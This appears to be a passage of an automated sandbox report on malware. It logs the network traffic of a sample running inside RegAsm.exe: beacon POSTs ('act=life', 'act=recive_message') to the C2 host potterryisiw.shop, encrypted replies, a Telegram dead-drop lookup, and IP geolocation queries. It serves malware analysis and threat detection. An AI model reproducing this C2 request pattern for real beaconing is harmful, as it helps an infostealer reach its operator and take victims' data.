2024-07-01 07:16:08 UTC	673	IN	Data Raw: 32 39 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a 5b Data Ascii: 29a{"status":"ok","demoInfo":{"ipAddress":"8.46.123.33","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":[
2024-07-01 07:16:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49759	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:20 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: potterryisiw.shop
2024-07-01 07:16:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-01 07:16:21 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l7r6a2u2k7cb73km312kd1q9r6; expires=Fri, 25-Oct-2024 01:03:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuFH8f40QB2ZlpPLu370KPjO%2FvwdzB38WnqO63jpw0dgZ7zha%2BfulxRHylXlkjcx1Eym9FgG5G8He4jqOEOaNB7b3O%2Be1AlXq8Tyn94nW%2BAtraiJZ7eqcXSE%2FTaPfQftFsDVXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c2e9a07439a-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:21 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-01 07:16:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49760	149.154.167.99	443	7236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:21 UTC	84	OUT	GET /g067n HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-07-01 07:16:21 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 01 Jul 2024 07:16:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12311 Connection: close Set-Cookie: stel_ssid=12893e7d252fd56885_16659854753162536403; expires=Tue, 02 Jul 2024 07:16:21 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-07-01 07:16:21 UTC	12311	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 30 36 37 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g067n</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49761	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: potterryisiw.shop
2024-07-01 07:16:21 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--default2806&j=
2024-07-01 07:16:22 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=snjjkoe8de9l16ksmhm5l9jmc1; expires=Fri, 25-Oct-2024 01:03:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhfpF57PRccixBoUKKeH9UEQfPl3mhs%2BNRFgzdQg58QYfwyM1gZFpfYsvSY3zWXmUu8qjEePwMrFnfoQxsiZC0s2NPTKy4kckEnTCP%2BaypOPkF4JZdmrIBlFUrFbxd3n7X5rSg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c3579de7d02-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:22 UTC	565	IN	Data Raw: 32 38 36 66 0d 0a 73 4c 45 62 32 66 6f 32 6e 53 74 69 69 6b 44 70 55 62 75 4b 5a 5a 37 37 6b 64 46 36 2b 32 57 36 52 44 6f 65 2b 59 49 73 59 73 50 4c 75 78 4c 37 6a 42 53 6e 43 31 61 6d 53 75 42 7a 79 4f 39 48 70 4e 76 6c 6f 77 2b 65 53 62 42 4e 47 48 2b 64 6f 42 5a 43 70 64 48 64 61 4c 7a 57 50 4a 51 4a 42 2f 4a 69 30 33 48 67 67 47 79 58 67 4c 48 7a 48 35 56 48 67 47 51 59 65 35 50 67 54 51 36 68 30 64 70 30 71 5a 5a 56 39 55 63 46 34 69 57 4b 4e 64 72 6d 43 50 75 65 39 4c 41 51 6c 51 7a 58 4c 46 63 38 31 61 49 4f 42 37 6d 53 69 7a 76 37 74 31 50 70 53 69 2f 72 4d 34 4a 7a 6d 2f 64 4a 6c 50 4b 59 71 6c 72 5a 41 4e 52 6d 41 44 37 62 34 30 6b 41 72 39 62 56 63 4c 47 53 58 76 6c 49 42 75 41 77 67 44 66 54 34 67 66 36 6b 76 36 37 43 70 63 44 30 43 70 5a 63 Data Ascii: 286fsLEb2fo2nStiikDpUbuKZZ77kdF6+2W6RDoe+YIsYsPLuxL7jBSnC1amSuBzyO9HpNvlow+eSbBNGH+doBZCpdHdaLzWPJQJB/Ji03HggGyXgLHzH5VHgGQYe5PgTQ6h0dp0qZZV9UcF4iWKNdrmCPue9LAQlQzXLFc81aIOB7mSizv7t1PpSi/rM4Jzm/dJlPKYqlrZANRmAD7b40kAr9bVcLGSXvlIBuAwgDfT4gf6kv67CpcD0CpZc
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 2f 6d 56 44 2b 54 51 37 6d 4a 6f 63 31 31 2b 55 49 2b 70 50 7a 74 42 4b 52 44 39 6b 72 55 33 4f 62 35 55 4d 45 70 39 37 53 66 50 76 57 46 72 39 4f 47 4b 68 36 79 58 50 33 37 77 54 75 32 38 61 77 46 70 63 41 7a 6d 59 61 59 39 57 49 4a 57 75 34 6b 4a 4e 2b 74 39 67 4d 76 51 6b 4f 37 53 32 5a 4d 73 76 74 43 65 36 56 39 72 55 56 6d 67 6e 59 49 31 39 78 6c 65 5a 4a 41 36 6e 57 30 6e 65 33 6b 6c 66 37 53 6b 43 6d 59 4d 73 30 77 61 68 66 76 74 6e 43 73 42 79 65 46 64 73 6f 47 44 36 45 72 69 5a 72 79 73 75 52 4f 62 79 55 46 4b 63 4c 51 4f 49 6b 68 6a 72 53 37 77 2f 77 69 2f 69 38 47 35 41 41 33 69 78 62 64 4a 48 6d 51 41 47 6d 31 39 52 72 74 5a 4e 5a 2f 45 4d 47 71 47 7a 4a 63 39 37 77 52 36 54 62 73 35 30 62 69 42 48 71 4a 55 6c 74 32 36 4a 52 54 73 6d 35 75 47 Data Ascii: /mVD+TQ7mJoc11+UI+pPztBKRD9krU3Ob5UMEp97SfPvWFr9OGKh6yXP37wTu28awFpcAzmYaY9WIJWu4kJN+t9gMvQkO7S2ZMsvtCe6V9rUVmgnYI19xleZJA6nW0ne3klf7SkCmYMs0wahfvtnCsByeFdsoGD6EriZrysuRObyUFKcLQOIkhjrS7w/wi/i8G5AA3ixbdJHmQAGm19RrtZNZ/EMGqGzJc97wR6Tbs50biBHqJUlt26JRTsm5uG
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 2b 46 39 41 71 6a 33 46 57 37 4b 44 48 72 37 5a 39 4c 39 59 77 55 57 59 4b 6c 46 38 6b 4f 70 4b 41 4b 62 66 31 6e 71 38 6d 31 6e 34 51 77 37 76 4a 6f 63 36 31 4f 34 48 2b 35 33 32 6f 52 32 51 43 39 52 6d 46 6a 37 62 35 31 5a 41 2b 5a 43 54 56 72 79 4f 56 39 42 4b 45 65 46 69 79 53 79 58 67 47 79 58 67 4c 48 7a 48 35 56 48 67 47 51 59 65 35 37 6f 52 51 61 70 30 73 46 38 74 5a 4e 56 39 55 38 42 35 53 36 4e 4d 39 6a 6f 41 66 43 5a 39 4c 51 4b 69 77 4c 65 4e 46 49 38 31 61 49 4f 42 37 6d 53 69 7a 76 37 72 6b 54 6f 57 42 61 71 46 34 67 39 31 2b 38 52 76 4e 76 73 2f 58 44 79 62 4d 46 6b 47 48 75 58 6f 42 5a 43 34 64 6e 54 64 62 79 51 55 76 74 42 44 2b 63 72 6d 54 4c 56 35 68 58 37 6d 66 71 39 46 35 55 4f 31 53 46 56 64 35 48 74 53 67 65 67 6b 70 30 37 2b 35 39 Data Ascii: +F9Aqj3FW7KDHr7Z9L9YwUWYKlF8kOpKAKbf1nq8m1n4Qw7vJoc61O4H+532oR2QC9RmFj7b51ZA+ZCTVryOV9BKEeFiySyXgGyXgLHzH5VHgGQYe57oRQap0sF8tZNV9U8B5S6NM9joAfCZ9LQKiwLeNFI81aIOB7mSizv7rkToWBaqF4g91+8RvNvs/XDybMFkGHuXoBZC4dnTdbyQUvtBD+crmTLV5hX7mfq9F5UO1SFVd5HtSgegkp07+59
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 4f 38 73 68 6a 6a 66 34 77 44 37 6e 2f 36 37 46 5a 77 45 32 53 4a 53 62 70 6a 72 52 41 32 72 6b 70 30 37 2b 35 39 4d 76 78 46 43 71 41 57 48 47 73 6e 7a 46 65 72 5a 73 61 78 57 38 57 79 7a 50 78 6f 38 6e 4f 77 4f 57 4f 4f 53 30 48 61 79 6c 31 7a 33 52 67 2f 73 4c 49 30 31 31 4f 30 49 39 6f 76 37 76 52 57 53 43 4e 4d 30 57 48 47 66 37 45 6f 49 71 74 69 54 4e 2f 6e 59 55 2b 63 4a 57 4b 70 69 76 6a 37 57 36 41 54 71 32 62 47 73 56 76 46 73 73 7a 38 61 50 4a 7a 73 44 6c 6a 6a 6b 74 39 33 75 35 64 59 38 30 49 49 36 53 36 46 4e 4e 7a 68 44 2f 53 4c 38 72 63 51 6d 41 6e 58 4a 31 78 35 6e 75 52 4a 42 4b 66 64 6b 7a 66 35 32 46 50 6e 43 56 69 71 59 71 51 55 37 4b 6f 6d 78 74 6d 78 72 46 62 78 62 4c 4d 2f 47 6a 79 63 37 41 35 59 34 35 4c 66 65 72 65 51 57 2f 6c 41 Data Ascii: O8shjjf4wD7n/67FZwE2SJSbpjrRA2rkp07+59MvxFCqAWHGsnzFerZsaxW8WyzPxo8nOwOWOOS0Hayl1z3Rg/sLI011O0I9ov7vRWSCNM0WHGf7EoIqtiTN/nYU+cJWKpivj7W6ATq2bGsVvFssz8aPJzsDljjkt93u5dY80II6S6FNNzhD/SL8rcQmAnXJ1x5nuRJBKfdkzf52FPnCViqYqQU7KomxtmxrFbxbLM/Gjyc7A5Y45LfereQW/lA
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 30 79 32 75 30 45 2b 5a 2f 79 73 78 53 54 41 4e 41 73 56 6e 47 64 35 45 67 47 34 5a 79 52 4f 62 79 41 46 4b 63 4c 51 4e 6f 76 68 54 72 61 37 67 72 71 73 63 4c 7a 57 6f 5a 4a 73 45 30 7a 5a 64 6d 67 53 51 7a 68 69 70 45 35 76 35 4e 63 38 30 77 49 37 53 4f 44 4f 64 48 6e 43 4f 36 59 2f 4c 6f 66 6b 67 72 58 4b 46 31 79 69 65 64 46 43 36 6e 62 33 58 2f 37 31 68 61 2f 54 68 69 6f 65 73 6c 7a 37 2b 73 4a 39 34 6a 38 73 42 54 5a 52 63 64 6f 4d 42 66 77 2b 51 78 41 70 74 36 54 49 66 6e 59 58 76 52 4e 41 2b 77 6e 68 44 4c 59 37 68 58 37 6b 4f 47 39 46 5a 59 50 30 43 39 5a 65 4a 37 74 53 41 79 72 30 39 52 33 74 5a 41 55 73 51 74 41 37 7a 72 4c 61 35 75 6f 4a 75 79 43 34 61 55 56 75 41 72 58 5a 68 70 6a 31 59 67 6c 61 37 69 51 6b 33 36 33 32 41 79 39 43 51 6e 36 4a Data Ascii: 0y2u0E+Z/ysxSTANAsVnGd5EgG4ZyRObyAFKcLQNovhTra7grqscLzWoZJsE0zZdmgSQzhipE5v5Nc80wI7SODOdHnCO6Y/LofkgrXKF1yiedFC6nb3X/71ha/Thioeslz7+sJ94j8sBTZRcdoMBfw+QxApt6TIfnYXvRNA+wnhDLY7hX7kOG9FZYP0C9ZeJ7tSAyr09R3tZAUsQtA7zrLa5uoJuyC4aUVuArXZhpj1Ygla7iQk3632Ay9CQn6J
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 6d 44 76 32 52 2f 62 38 51 6e 52 58 59 4c 56 46 7a 6d 75 39 4f 41 36 44 59 32 32 75 39 6d 46 2f 33 54 67 6a 73 4c 4a 6b 79 31 71 68 4a 76 74 6e 30 71 31 6a 42 52 5a 67 58 54 6e 75 63 37 77 77 70 70 73 6e 53 63 37 69 54 57 4c 38 4c 48 36 5a 4b 34 46 6a 41 71 6b 66 37 6c 62 50 72 57 74 6b 4b 31 43 74 63 62 70 66 67 54 67 6d 6d 32 4d 46 32 74 4a 56 58 2f 30 77 53 36 54 43 45 4f 4e 7a 72 41 2f 4f 57 2f 37 73 53 32 55 6d 61 5a 6c 39 6b 32 37 67 4d 51 49 33 52 77 6e 50 35 76 30 37 70 54 67 7a 35 4b 59 59 2f 6d 61 6f 59 73 76 47 59 32 41 48 62 52 39 38 71 47 43 54 5a 6f 45 34 42 72 4d 44 57 65 4c 47 53 57 66 64 47 42 65 30 74 6a 7a 66 53 35 68 58 79 6c 76 4f 31 45 35 67 43 32 79 31 53 63 70 4c 79 44 6b 37 6a 6b 74 52 68 2b 38 41 57 76 32 4d 62 36 53 2b 48 63 66 Data Ascii: mDv2R/b8QnRXYLVFzmu9OA6DY22u9mF/3TgjsLJky1qhJvtn0q1jBRZgXTnuc7wwppsnSc7iTWL8LH6ZK4FjAqkf7lbPrWtkK1CtcbpfgTgmm2MF2tJVX/0wS6TCEONzrA/OW/7sS2UmaZl9k27gMQI3RwnP5v07pTgz5KYY/maoYsvGY2AHbR98qGCTZoE4BrMDWeLGSWfdGBe0tjzfS5hXylvO1E5gC2y1ScpLyDk7jktRh+8AWv2Mb6S+Hcf
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 6d 76 32 37 45 5a 6b 4a 32 43 64 56 66 4e 75 75 44 45 43 6d 79 70 4d 68 2b 64 68 78 33 46 34 57 34 6d 43 6f 4a 4d 2f 69 41 50 43 50 2b 4c 49 62 6a 77 72 49 5a 68 70 6a 31 59 67 6c 61 37 69 51 6b 33 36 33 32 41 79 39 43 51 76 6e 4c 49 59 34 33 65 45 43 39 4a 72 32 74 68 4b 56 43 39 6b 75 55 58 61 65 35 55 67 4b 6f 74 7a 63 65 4c 65 63 58 66 46 41 51 4b 5a 67 79 7a 54 42 71 46 2b 2b 32 63 57 6a 48 34 45 4b 79 47 52 71 66 34 72 78 57 77 32 78 31 4a 46 57 75 4a 52 58 2b 6b 34 51 71 47 43 55 66 62 47 44 62 4f 58 62 73 37 51 55 32 56 2b 61 5a 6c 68 34 6c 2b 4e 4a 44 71 37 66 33 48 36 77 6c 31 37 78 57 77 2f 74 4b 6f 63 37 31 50 6f 4e 39 6f 76 36 75 68 57 58 44 38 6f 6c 47 44 4c 5a 6f 45 6b 59 34 59 71 52 4f 59 6d 53 56 2f 4e 66 44 65 64 69 79 53 79 58 67 47 79 Data Ascii: mv27EZkJ2CdVfNuuDECmypMh+dhx3F4W4mCoJM/iAPCP+LIbjwrIZhpj1Ygla7iQk3632Ay9CQvnLIY43eEC9Jr2thKVC9kuUXae5UgKotzceLecXfFAQKZgyzTBqF++2cWjH4EKyGRqf4rxWw2x1JFWuJRX+k4QqGCUfbGDbOXbs7QU2V+aZlh4l+NJDq7f3H6wl17xWw/tKoc71PoN9ov6uhWXD8olGDLZoEkY4YqROYmSV/NfDediySyXgGy
2024-07-01 07:16:22 UTC	1369	IN	Data Raw: 68 57 53 43 39 55 70 55 7a 7a 56 69 43 56 72 79 70 4c 56 4f 65 50 61 42 4c 45 68 61 34 4e 4a 79 7a 66 49 71 46 2b 2b 79 61 48 6f 54 63 70 51 69 48 51 77 46 2f 44 2f 41 47 6a 4b 75 63 6f 52 30 50 4d 2f 76 31 39 41 73 47 44 5a 66 62 47 44 62 4a 66 5a 34 66 4e 41 32 30 65 66 4a 55 70 75 6e 65 4e 59 41 2b 62 73 37 56 71 73 6a 6c 37 6b 43 79 62 76 4d 34 49 6c 31 50 6f 35 77 72 66 2b 73 68 75 58 52 65 6b 77 56 57 79 59 35 55 6b 2b 6e 39 7a 55 62 62 79 57 55 76 38 4a 54 6f 42 4a 34 46 69 5a 35 30 65 6b 32 38 72 7a 55 4e 6b 34 6c 6b 34 7a 46 2f 43 67 56 6b 44 35 6b 4a 4e 4d 75 4a 5a 61 2b 46 38 52 70 51 47 63 4a 64 50 7a 52 64 71 65 34 72 6f 4f 6c 42 57 59 61 44 41 58 38 49 73 4f 42 75 47 4b 6b 53 6e 31 38 44 2b 55 49 6b 44 73 4d 38 74 72 6d 37 68 56 70 38 79 67 Data Ascii: hWSC9UpUzzViCVrypLVOePaBLEha4NJyzfIqF++yaHoTcpQiHQwF/D/AGjKucoR0PM/v19AsGDZfbGDbJfZ4fNA20efJUpuneNYA+bs7Vqsjl7kCybvM4Il1Po5wrf+shuXRekwVWyY5Uk+n9zUbbyWUv8JToBJ4FiZ50ek28rzUNk4lk4zF/CgVkD5kJNMuJZa+F8RpQGcJdPzRdqe4roOlBWYaDAX8IsOBuGKkSn18D+UIkDsM8trm7hVp8yg
2024-07-01 07:16:22 UTC	211	IN	Data Raw: 69 57 54 6a 4d 58 38 4b 42 57 51 50 6d 51 6b 30 79 34 6c 6c 72 34 58 78 47 6c 42 59 55 30 32 50 34 58 38 5a 58 53 73 41 6d 54 52 35 5a 4f 4d 78 66 77 6f 45 68 41 2b 5a 43 42 4e 39 50 7a 50 35 51 4a 42 50 6c 69 30 33 47 4a 75 6c 79 70 79 71 54 6a 53 76 46 73 73 7a 6b 57 46 50 43 4c 56 32 6a 4b 75 62 67 35 72 64 67 4d 76 52 74 4f 67 45 6e 67 57 4a 6e 36 52 36 54 62 73 2f 51 62 69 78 58 65 4a 55 35 2f 33 4e 35 77 4a 62 62 52 77 33 2b 34 70 6d 72 55 52 51 62 76 4f 49 77 31 2f 38 68 48 73 76 47 59 32 48 50 5a 43 4a 68 2b 47 6b 58 62 71 41 34 2f 37 37 71 34 45 74 44 59 54 4c 38 52 51 71 67 58 69 44 33 58 37 78 48 74 31 4e 61 0d 0a Data Ascii: iWTjMX8KBWQPmQk0y4llr4XxGlBYU02P4X8ZXSsAmTR5ZOMxfwoEhA+ZCBN9PzP5QJBPli03GJulypyqTjSvFsszkWFPCLV2jKubg5rdgMvRtOgEngWJn6R6Tbs/QbixXeJU5/3N5wJbbRw3+4pmrURQbvOIw1/8hHsvGY2HPZCJh+GkXbqA4/77q4EtDYTL8RQqgXiD3X7xHt1Na

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49762	34.117.186.192	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:21 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-07-01 07:16:22 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 07:16:22 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 1 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 07:16:22 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-07-01 07:16:22 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49765	104.26.4.15	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:22 UTC	260	OUT	GET /demo/home.php?s=8.46.123.33 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-07-01 07:16:22 UTC	659	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:22 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: A29E3EFE:5114_93878F2E:0050_668257C6_168CBC36:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GsGj9dVjQjcGDd7v9Dp%2Bf%2FvkPpSpm1apEJ83AitGaBxuscpzH%2Bhs5JQQUKAseo2EeMV7J%2B4LLTfcfjofBOLy3T%2BQoLvwdtwN1JxTbmd1NVb0W1Emz9GGxRjTWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c39b8f215d7-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:22 UTC	673	IN	Data Raw: 32 39 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a 5b Data Ascii: 29a{"status":"ok","demoInfo":{"ipAddress":"8.46.123.33","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":[
2024-07-01 07:16:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49766	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
